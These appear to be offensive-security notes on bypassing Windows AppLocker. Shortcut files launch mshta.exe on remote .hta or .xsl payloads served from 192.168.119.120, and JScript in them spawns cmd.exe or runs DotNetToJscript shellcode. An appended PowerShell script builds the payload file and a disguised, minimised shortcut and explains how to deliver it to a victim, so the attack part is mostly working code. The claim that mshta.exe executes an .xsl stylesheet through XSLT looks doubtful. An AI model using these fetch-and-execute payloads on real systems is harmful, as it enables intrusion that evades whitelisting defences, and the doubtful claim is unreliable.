AppLocker Bypass with JScript

By sending a shortcut file that launches mshta.exe on a .hta file with embedded JScript


Note that mshta.exe downloads the .hta file to disk before executing it, so any installed endpoint detection software still has to be bypassed.

shortcut.lnk
mshta.exe http://192.168.119.120/test.hta

The JScript payload is generated with DotNetToJscript (as a Windows Script Host .js script) and embedded in the .hta file inside a script block.

See Jscript Shellcode Runner - DotNetToJscript
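The two artefacts the steps above describe, the .hta wrapper and the shortcut that launches it, as an added example that is not part of the original page. It assumes the attacker's web root is C:\www and the listener is the page's 192.168.119.120; the JScript body is a placeholder that pops calc.exe where the DotNetToJscript-generated script would normally be pasted.

```powershell
# Added example (not from the original page): builds the .hta wrapper that
# carries a JScript payload and the .lnk that launches it through mshta.exe.
# Assumptions: web root C:\www, listener 192.168.119.120 (as on the page),
# and a placeholder payload in place of the DotNetToJscript output.

$WebRoot = 'C:\www'
$HtaUrl  = 'http://192.168.119.120/test.hta'

# Placeholder JScript body; replace with the DotNetToJscript-generated script.
$JScriptPayload = @'
var r = new ActiveXObject("WScript.Shell");
r.Run("calc.exe");
'@

# HTA wrapper: mshta.exe parses this as HTML and runs the JScript block.
# Do not call window.close() here for a shellcode runner; that would end
# the mshta.exe process before an injected thread has finished.
$Hta = @"
<html>
<head>
<script language="JScript">
$JScriptPayload
</script>
</head>
<body></body>
</html>
"@

New-Item -ItemType Directory -Path $WebRoot -Force | Out-Null
Set-Content -Path (Join-Path $WebRoot 'test.hta') -Value $Hta -Encoding ASCII

# Shortcut the victim double-clicks: the target is the AppLocker-trusted
# mshta.exe, and the remote .hta is passed as its argument.
$Shell = New-Object -ComObject WScript.Shell
$Lnk = $Shell.CreateShortcut((Join-Path $WebRoot 'shortcut.lnk'))
$Lnk.TargetPath   = "$env:SystemRoot\System32\mshta.exe"
$Lnk.Arguments    = $HtaUrl
$Lnk.IconLocation = "$env:SystemRoot\System32\shell32.dll,1"   # hypothetical icon choice
$Lnk.WindowStyle  = 7   # minimized window
$Lnk.Save()
```

Serve C:\www over HTTP on the listener (any static web server will do) and deliver shortcut.lnk to the victim; the .hta is fetched and executed by mshta.exe, which AppLocker's default rules allow because it lives under C:\Windows\System32.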

By Extensible Stylesheet Language (.xsl) through an XSL Transformation (XSLT)

This application whitelisting bypass can also be triggered through a shortcut file delivered to the victim (the same .xsl payload is also the one commonly executed through XSLT-capable binaries such as wmic.exe with its /format switch):

shortcut.lnk
mshta.exe http://192.168.119.120/test.xsl

test.xsl
<?xml version='1.0'?>
<stylesheet version="1.0"
	xmlns="http://www.w3.org/1999/XSL/Transform"
	xmlns:ms="urn:schemas-microsoft-com:xslt"
	xmlns:user="http://mycompany.com/mynamespace">

	<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell");
			r.Run("cmd.exe");
		]]>
	</ms:script>
</stylesheet>
